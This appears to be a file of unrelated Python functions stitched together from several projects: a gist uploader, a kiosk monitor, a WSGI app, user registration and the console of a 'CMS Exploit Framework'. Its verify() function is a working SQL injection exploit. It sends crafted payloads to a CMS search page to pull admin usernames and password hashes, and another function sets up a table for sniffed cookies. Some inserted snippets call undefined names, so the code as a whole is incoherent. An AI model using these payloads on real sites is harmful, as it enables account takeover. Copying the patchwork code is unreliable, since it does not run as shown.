            logger.warn('Ctrl-C detected.')
            sys.exit(1)
    user = self.user
    pwd = self.pwd
    logger.info('auth: fetch new token')
    post_json = {
        'scopes': ['gist'],
        'note': 'paste.py @ ' + str(datetime.datetime.now()),
        'note_url': 'https://github.com/jackyyf/paste.py',
    }
    post_headers = {
        'Content-Type': 'application/json',
    }
    if otp_token is not None:
        post_headers['X-GitHub-OTP'] = otp_token
    post_str = json.dumps(post_json)
    post_url = _api_base + '/authorizations'
    logger.debug('post_url: ' + post_url)
    try:
        resp = self.req.post(post_url, data=post_str, headers=post_headers, auth=(user, pwd))
    except exceptions.RequestException as e:
        raise exception.ServerException(e)
    logger.info('http ok. response: %d %s' % (resp.status_code, resp.reason))
    if resp.status_code == 201:
        logger.info('auth ok.')
        token = resp.json()[u'token']
        logger.debug(resp.content)
        self.req.headers['Authorization'] = 'token ' + token
        return token
    elif resp.status_code == 401:
        # Two-factor auth?
        logger.warn('auth failed')
        if 'X-GitHub-OTP' in resp.headers:
            logger.warn('auth: two-factor required')
            try:
                token = raw_input('Two factor token from ' +
                                  resp.headers['X-Github-OTP'].replace('required; ', '') + ': ')
            except KeyboardInterrupt:
                logger.warn('Ctrl-C detected')
                sys.exit(1)
            return self._perform_auth(otp_token=token)
        else:
            logger.error('username or password error.')
            return self._perform_auth()
    else:
        raise exception.ServerException('Server responded with unknown status: %d %s'
                                        % (resp.status_code, resp.reason))
def init(self):
    try:
        self.cu.execute("DROP TABLE info;")
        self.cu.execute("DROP TABLE sniff")
        self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);")
        self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);")
        logger.success("Initialization succeeded")
    except:
        logger.error("Initialization failed")
        logger.info("Recreating the database tables")
        self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);")
        self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);")
        logger.success("Tables created")
def verify(URL):
    r = requests.get(URL + "/plus/search.php?keyword=as&typeArr[%20uNion%20]=a")
    r.close()
    if "Request Error step 1" in r.content:
        logger.success("Step 1: Exploitable!")
        result = get_hash(URL + "/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a")
        return result
    elif "Request Error step 2" in r.content:
        logger.success("Step 2: Exploitable!")
        result = get_hash(URL + "/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a")
        return result
    else:
        logger.error("It's not exploitable!")
def do_search(self, keyword):
    """
    Search plugins.
    :param keyword: string, the keyword to search for
    :return:
    """
    if keyword:
        print "\nMatching Plugins\n================\n"
        print "%-40s%-40s%s" % ("Name", "Scope", "Description")
        print "%-40s%-40s%s" % ("----", "-------", "-----------")
        for name, scope, description in self.search_plugin(keyword):
            print "%-40s%-40s%s" % (name, scope, description)
        print
    else:
        logger.error("search <keyword>")
def do_use(self, plugin):
    """
    Load a plugin.
    :param plugin: string, plugin name
    :return:
    """
    if plugin:
        try:
            self.load_plugin(plugin)
        except Exception:
            logger.error("Failed to load plugin: %s" % plugin)
        if self.current_plugin:
            self.prompt = "CMS Exploit Framework > %s > " % \
                          self.current_plugin
    else:
        logger.error("use <plugin>")
def __exit__(self, exc_type, exc_val, exc_tb):
    # adds support for the with statement
    try:
        if self.cur:
            self.cur.close()
    except:
        pass
    try:
        if self.db:
            self.close()
    except:
        pass
    if exc_type:
        error('%s', traceback.format_exc())
    return True  # suppress the exception
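# With __exit__ above (and a matching __enter__, assumed here), the wrapper
# can be used as a context manager: cursor and connection are closed even if
# the query raises, and the exception is suppressed. Db is a stand-in name.
with Db() as db:
    db.TQ("SELECT 1")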
def findLatestDate(path):
    ''' Finds the latest modification date of any file in a directory structure '''
    logger.debug("finding latest file mtime in %s" % path)
    if not str(ENABLECACHING).lower() in ['true', '1', 'on', 'enabled']:
        logger.debug("caching is disabled in the configuration file")
        return -1
    if not os.path.exists(path):
        logger.error("failed to determine last modified date; path '%s' does not exist" % path)
        return -1
    out = subprocess.Popen(shlex.split("find %s -type f -printf \"%%T@\n\"" % path),
                           stdout=subprocess.PIPE).communicate()[0]
    maxd = -1
    for i in out.split('\n'):
        if i.strip() and float(i) > maxd:
            maxd = float(i)
    return maxd
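# Sketch of a staleness check built from fileDate() and findLatestDate()
# above: rebuild the cache whenever any source file is newer than the cache
# file. cacheFile, sourceDir and rebuildCache() are hypothetical names.
if fileDate(cacheFile) < findLatestDate(sourceDir):
    rebuildCache()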
def run(self):
    print '[Monitor]sending beacon request', time.ctime()
    try:
        # send the beacon request to the server
        data = self.get_attrs()
        post_param = {
            "data": json.dumps(data)
        }
        req_url = self.conf['server'] + '/api/beacon?kioskId=' + data['kiosk_id']
        logger.info('[Monitor]req url: ' + req_url)
        server = self.conf['server']
        resp_body, resp_status = lib.inet.http_post(req_url, server, post_param)
        if len(resp_body) > 0:
            resp_body = json.loads(resp_body)
            print resp_body, resp_status, '\n'
    except Exception, e:
        logger.error('[Monitor] ' + str(e))
def do_options(self, line):
    """
    Show the current plugin's options.
    :return:
    """
    if self.current_plugin:
        rn = self.show_options()
        if isinstance(rn, str):
            logger.error(rn)
        else:
            print "\n\t%-20s%-40s%-10s%s" % ("Name", "Current Setting", "Required", "Description")
            print "\t%-20s%-40s%-10s%s" % ("----", "---------------", "--------", "-----------")
            for option in rn:
                print "\t%-20s%-40s%-10s%s" % (option["Name"],
                                               option["Current Setting"],
                                               option["Required"],
                                               option["Description"])
            print
    else:
        logger.error("Select a plugin first.")
def worker(self, sql_list=None, callback=None):
    rs = False
    if not sql_list:
        return rs
    self.db.autocommit(False)
    try:
        for sql in sql_list:
            self.Q(sql)
        self.db.commit()
        # run the caller's hook, if any
        if callback:
            callback()
        rs = True
    except:
        error("worker error: ", exc_info=True)
        self.db.rollback()
        rs = False
    finally:
        self.db.autocommit(True)
    return rs
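# Sketch: run two statements atomically through worker() above; both are
# committed together or rolled back together. db stands in for an instance of
# the wrapper class; table and ids are illustrative.
ok = db.worker([
    "UPDATE o_user_basic SET status = 0 WHERE uid = 41",
    "UPDATE o_user_basic SET status = 1 WHERE uid = 42",
])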
def __init__(self):
    """define the data structure that keeps monitor data"""
    self.ds = {
        'kiosk_id': '',
        'kiosk_ip': '',
        'mem_used': '',
        'cpu_used': '',
        'disk_free_size': '',
        'udm_rental_started': 0,
        'udm_controller_started': 0,
        'last_sync_time': 0,
        'net_recv_bytes': 0,    # NIC bytes received
        'net_send_bytes': 0,    # NIC bytes sent
        'last_boot_time': 0,    # time of the last boot
        'ubx_version': ''       # ubx program version number
    }
    conf = self.get_config()
    if len(conf) == 0:
        logger.error('invalid monitor config file')
        sys.exit(-1)
    self.conf = conf
def do_info(self, plugin):
    """
    Show plugin information.
    :param plugin: string, plugin name
    :return:
    """
    if not plugin:
        if self.current_plugin:
            plugin = self.current_plugin
        else:
            logger.error("info <plugin>")
            return
    if self.info_plugin(plugin):
        name, author, cms, scope, description, reference = \
            self.info_plugin(plugin)
        print "\n%15s: %s" % ("Name", name)
        print "%15s: %s" % ("CMS", cms)
        print "%15s: %s\n" % ("Scope", scope)
        print "Author:\n\t%s\n" % author
        print "Description:\n\t%s\n" % description
        print "Reference:\n\t%s\n" % reference
    else:
        logger.error("Invalid plugin: %s" % plugin)
def do_set(self, arg):
    """
    Set a plugin option.
    :param arg: string, option and value separated by a space
    :return:
    """
    if self.current_plugin:
        if len(arg.split()) == 2:
            option = arg.split()[0]
            value = arg.split()[1]
            rn = self.set_option(option, value)
            if rn.startswith("Invalid option:"):
                logger.error(rn)
            else:
                print rn
        else:
            logger.error("set <option> <value>")
    else:
        logger.error("Select a plugin first.")
def wsgiblankApplication(environ, startResponse):
    '''main function of the wsgiblank'''
    logger.info('running in wsgi mode')

    # reading configuration values
    try:
        urlPath = environ['PATH_INFO'].strip('/').split('/')
    except StandardError:
        urlPath = ['']
    try:
        queryString = urlparse.parse_qs(environ['QUERY_STRING'], keep_blank_values=1)
    except StandardError:
        queryString = []

    # Serve static content for WSGI servers
    if SERVERISAPACHE is False:
        if urlPath[0].lower() in STATIC:
            # set path
            path = os.path.join(INSTALLPATH, 'static', environ.get('PATH_INFO', '').lstrip('/'))
            if os.path.exists(path):                        # does it exist?
                filestat = os.stat(path)                    # get file stats
                fileToServe = file(path, 'r')               # read file
                mimeType = mimetypes.guess_type(path)       # guess mime-type
                # set headers
                if mimeType[0] == None:
                    headers = [(CONTENT_LENGTH, str(filestat.st_size))]
                else:
                    headers = [(CONTENT_TYPE, mimeType[0]),
                               (CONTENT_LENGTH, str(filestat.st_size))]
                startResponse('200 OK', headers)            # set response
                return environ['wsgi.file_wrapper'](fileToServe)  # return file
            else:
                logger.debug('static content not found: %s' % str(path))
                return notFound(environ, startResponse)     # 404

    try:
        requestBodySize = int(environ.get('CONTENT_LENGTH', 0))
    except ValueError:
        requestBodySize = 0

    # Saving wsgi.input since it can be read only once
    wsgiInputStorage = StringIO(environ['wsgi.input'].read(requestBodySize))
    environ['wsgi.input'] = wsgiInputStorage
    try:
        postData = urlparse.parse_qs(environ['wsgi.input'].read(requestBodySize), True)
    except StandardError:
        postData = []
    # seek back to the first byte of wsgiInputStorage
    wsgiInputStorage.seek(0)
    environ['wsgi_input'] = wsgiInputStorage

    cookies = {}
    if 'HTTP_COOKIE' in environ:
        for i in environ['HTTP_COOKIE'].split(';'):
            cookie = i.strip().partition('=')
            try:
                cookies[cookie[0]] = cookie[2].strip()
            except StandardError:
                pass

    logger.debug(' urlPath: %s' % str(urlPath))
    logger.debug(' queryString: %s' % str(queryString))
    try:
        logger.debug(' userAgent: %s' % str(environ['HTTP_USER_AGENT'] if 'HTTP_USER_AGENT' in environ else ''))
        logger.debug(' remoteAddr: %s' % str(environ['REMOTE_ADDR'] if 'REMOTE_ADDR' in environ else ''))
    except StandardError:
        pass
    for i in cookies.keys():
        logger.debug(' cookie: %s = %s' % (i, cookies[i]))

    accessLevel = NO_ACCESS
    userName = ''
    # authentication can be disabled for debug reasons via the config file
    enableAuthentication = 1
    try:
        if str(config.get('authentication', 'enableAuthentication')).lower() in ['false', '0']:
            enableAuthentication = 0
            accessLevel = int(config.get('authentication', 'accessLevel'))
            userName = str(config.get('authentication', 'userName'))
    except StandardError:
        pass

    # checking authentication
    if enableAuthentication and AUTHCOOKIENAME in cookies:
        try:
            [uName, key] = cookies[AUTHCOOKIENAME].strip().split(':')
            accessLevel = auth.querySession(uName, key)
            if accessLevel > NO_ACCESS:
                userName = uName
        except ValueError:
            pass
    logger.debug(' accessLevel: %d, username: %s' % (accessLevel, userName))

    if urlPath[0].lower() == 'debug' and accessLevel == RW_ACCESS:
        raise Exception('debug')
    else:
        # serve the requested content: decide which module to call
        moduleFile = ''
        moduleName = DEFAULT_MODULE
        if not SERVERISAPACHE:
            if urlPath[0] != 'wsgiblank' or urlPath == []:
                urlPath.insert(0, 'wsgiblank')
        if len(urlPath) == 1:
            # for evaluating urlPath[0 if SERVERISAPACHE else 1]
            urlPath.insert(1, '')
        if urlPath == [] or not urlPath[0 if SERVERISAPACHE else 1].lower() in MODULES:
            # if the requested module is not available or no module is
            # specified, load the default one from the config
            logger.debug(' module not found, falling back to default module: %s' % DEFAULT_MODULE)
            moduleFile = os.path.join(LIBPATH, 'module',
                                      MODULES[DEFAULT_MODULE]['dirname'],
                                      MODULES[DEFAULT_MODULE]['filename'])
        else:
            # loading the selected module
            moduleName = urlPath[0 if SERVERISAPACHE else 1].lower()
            logger.debug(' trying to load module: %s' % moduleName)
            if MODULES[moduleName]['enabled'] == 'enabled' and MODULES[moduleName]['access'] <= accessLevel:
                # load the selected module
                moduleFile = os.path.join(LIBPATH, 'module',
                                          MODULES[moduleName]['dirname'],
                                          MODULES[moduleName]['filename'])
                logger.debug(' determining module file: %s' % moduleFile)
            else:
                # load the default module
                moduleFile = os.path.join(LIBPATH, 'module',
                                          MODULES[DEFAULT_MODULE]['dirname'],
                                          MODULES[DEFAULT_MODULE]['filename'])
                logger.debug(' don\'t load module because status is disabled or level of access is not met (status: %s, access: %d)'
                             % (MODULES[moduleName]['enabled'], MODULES[moduleName]['access']))

        try:
            # try to load the module lib
            module = imp.load_source(moduleName, moduleFile)
        except IOError as eIO:
            logger.error(' unable to load requested module: \'%s\'' % moduleFile)
            logger.error(' got exception: %s' % eIO)
        logger.debug(' module loaded: \'%s\'' % moduleFile)
        logger.debug(' postData: %s' % str(postData))

        responseHeaders, returnStatus, content = module.content(
            userName,
            accessLevel,
            command=urlPath[1].lower() if len(urlPath) > 1 else '',
            queryString=queryString,
            postData=postData,
            cookies=cookies,
        )
        startResponse(returnStatus, responseHeaders)
        return [content]
async def add_user(obj):
    '''
    * `reg_qid` registration id: the WeChat/QQ/Weibo openid, or the phone number
    * `token`
    * `reg_source` registration source: wx: WeChat, qq: QQ, wb: Sina Weibo, mb: phone number
    * `invite_uid` inviter uid
    * `ip` registration ip
    * `os_type` OS type
    * `device_id` device_id
    * `app_version` app version the registration came from
    * `channel` channel
    * `nickname`
    * `gender`
    * `figure_url`
    * `figure_url_other` other avatar urls
    * `province`
    * `city`
    * `country`
    * `year` year of birth
    '''
    ret = {'uid': None, 'ticket': None, 'message': '', 'code': 0}
    if obj['invite_uid']:
        res = UserLib.check_user_by_uid(obj['invite_uid'])
        if not res:
            info('invalid inviter %s', obj['invite_uid'])
            obj['invite_uid'] = '0'
    else:
        obj['invite_uid'] = '0'

    res = UserLib.get_info_by_qid(obj['reg_qid'], obj['reg_source'])
    if res:
        ret['message'] = '%s is already registered, please log in' % UserLib.REG_SOURCE_DESC.get(obj['reg_source'], '')
        ret['code'] = err_code._ERR_ALREADY_REGISTERED
        return ret

    m = tools.mysql_conn()
    m_score = None
    r = tools.get_redis()
    try:
        salt = UserLib.get_salt()
        sql = "INSERT INTO o_user_basic(ctime, channel, os_type, app_version, package_name, reg_ip, invite_uid, reg_source, reg_qid, salt, device_id, status) " \
              "VALUES(NOW(), %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, 1)"
        args = (obj['channel'], obj['os_type'], obj['app_version'], obj['package_name'],
                obj['reg_ip'], obj['invite_uid'], obj['reg_source'], obj['reg_qid'],
                salt, obj['device_id'])
        m.TQ(sql, args)
        uid = m.db.insert_id()
        assert uid

        m_score = tools.mysql_conn('d')
        if obj['reg_source'] == 'mb':
            # phone-number registration: the nickname defaults to something like
            # 139*****888 (the middle 5 digits are hidden)
            obj['nickname'] = '%s*****%s' % (str(obj['reg_qid'])[:3], str(obj['reg_qid'])[-3:])
        # some nicknames have leading/trailing whitespace or blank lines; clean them up
        obj['nickname'] = obj['nickname'].strip()

        ticket = await UserLib.get_new_ticket(uid, obj['reg_qid'], salt)
        sql = "INSERT INTO o_user_extra(uid, reg_source, reg_qid, token, nickname, gender, figure_url, figure_url_other, province, city, country, year) " \
              "VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
        args = (uid, obj['reg_source'], obj['reg_qid'], obj['token'], obj['nickname'],
                obj['gender'], obj['figure_url'], obj['figure_url_other'],
                obj['province'], obj['city'], obj['country'], obj['year'])
        m.TQ(sql, args)

        # info('uid: %s, score_table: %s' % (uid, UserLib._which_score_table(uid)))
        m_score.TQ("INSERT INTO %s (uid, score) VALUES(%%s, %%s)" % UserLib._which_score_table(uid), (uid, 0))

        m.db.commit()
        m_score.db.commit()
        UserLib.clear_cache(uid, obj['reg_qid'], obj['reg_source'])
    except:
        traceback.print_exc()
        try:
            m.db.rollback()
        except:
            pass
        if m_score:
            try:
                m_score.db.rollback()
            except:
                pass
        error('database error while adding a new user', exc_info=True)
        ret['message'] = 'Registration failed'
        ret['code'] = err_code._ERR_REGISTERED_ERROR
        return ret

    info('user registered successfully reg_qid: %s uid: %s ticket: %s', obj['reg_qid'], uid, ticket)
    ret['uid'] = uid
    ret['ticket'] = ticket
    return ret
def push(self):
    # TODO: Implement push.
    conf = config.getConfig()
    res = self._do_auth()
    if res is not None:
        if not res:
            if conf.getboolean('check', True):
                print 'Token is invalid, please use paste.py gist auth to get a new token.'
                sys.exit(1)
            else:
                del self.req.headers['Authorization']
    files = conf.require('files')
    if files.count(sys.stdin) > 1:
        raise exception.InvalidValue('stdin was listed more than once!')
    logger.debug('private: ' + ('yes' if conf.require('private') else 'no'))
    logger.debug('description: ' + conf.require('description'))
    logger.debug('files: ' + str(len(files)))
    post_data = {
        'public': not conf.require('private'),
        'description': conf.require('description'),
    }
    file_data = dict()
    try:
        for file in files:
            logger.info('reading file ' + file.name)
            if file is sys.stdin:
                print 'Type your content here, end with EOF'
                print 'Use Ctrl-C to interrupt, if you have mistyped something.'
            content = file.read()
            logger.debug('file ' + file.name + ': %d lines, %d bytes'
                         % (content.count('\n'), len(content)))
            fname = os.path.basename(file.name)
            now = 2
            if fname in file_data:
                if '.' in fname:
                    name, ext = fname.rsplit('.', 1)
                else:
                    name, ext = fname, ''
                while (name + '-' + str(now) + '.' + ext) in file_data:
                    now += 1
                fname = (name + '-' + str(now) + '.' + ext)
                logger.debug('final filename: ' + fname)
            file_data[fname] = {
                'content': content,
            }
    except KeyboardInterrupt:
        logger.warn('Ctrl-C received, exiting.')
        sys.exit(1)
    post_data['files'] = file_data
    post_str = json.dumps(post_data)
    post_url = _api_base + '/gists'
    logger.debug('post url: ' + post_url)
    try:
        resp = self.req.post(post_url, data=post_str, headers={
            'Content-Type': 'application/json',
        })
    except exceptions.RequestException as e:
        logger.error('Post error: ' + e.message)
        raise exception.ServerException(e)
    logger.debug('http ok.')
    logger.info('server response: %d %s' % (resp.status_code, resp.reason))
    if resp.status_code == 201:
        logger.info('gist created')
        url = resp.json()[u'html_url']
        gistid = url.rsplit('/', 1)[1]
        print 'HTTP Link: ' + url
        print 'Paste.py uri: gist://' + gistid
    else:
        raise exception.ServerException('Server responded with unknown status: %d %s'
                                        % (resp.status_code, resp.reason))
try:
    WEBSERVERHOST = config.get('general', 'WEBSERVERHOST')
    WEBSERVERPORT = config.get('general', 'WEBSERVERPORT')
    AUTHCOOKIENAME = config.get('authentication', 'COOKIENAME')
except Exception as e:
    raise Exception('error during processing config file: \'%s\'' % e)

sys.path.append(LIBPATH)

import lib.logger as logger
import lib.utils as utils
import lib.auth as auth
from lib.conf import *

STATIC = utils.getFolders(os.path.join(INSTALLPATH, 'static'))
if STATIC == 0:
    logger.error('Listing static folders failed')

# All URLs are prefixed with wsgiblank and it's handled differently in Apache
# and stand-alone wsgi server mode
SERVERISAPACHE = True


# 404 handler
def notFound(environ, startResponse):
    '''return 404 if content not found'''
    startResponse("404 " + CODE[404],
                  [(CONTENT_TYPE, CONTENT_TXT),
                   (CONTENT_LENGTH, str(len(CODE[404])))])
    return [CODE[404]]